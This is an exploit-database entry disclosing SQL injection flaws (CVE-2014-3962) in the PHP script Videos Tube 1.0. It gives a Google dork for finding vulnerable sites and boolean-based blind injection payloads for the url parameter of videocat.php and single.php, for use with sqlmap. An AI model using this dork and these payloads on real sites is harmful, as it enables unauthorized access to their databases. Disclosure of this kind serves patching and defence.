[] NeoSense
E X P L O I T S
title author type platform port cve id

Videos Tube 1.0 - Multiple SQL Injections

Author: Mustafa ALTINKAYNAK
type: webapps
platform: php
port: 80.0
date_added: 2014-05-26 
date_updated: 2014-05-29 
verified: 1 
codes: CVE-2014-3962;OSVDB-107631;OSVDB-107630 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0

Description (Açıklama)
========================
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.

Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.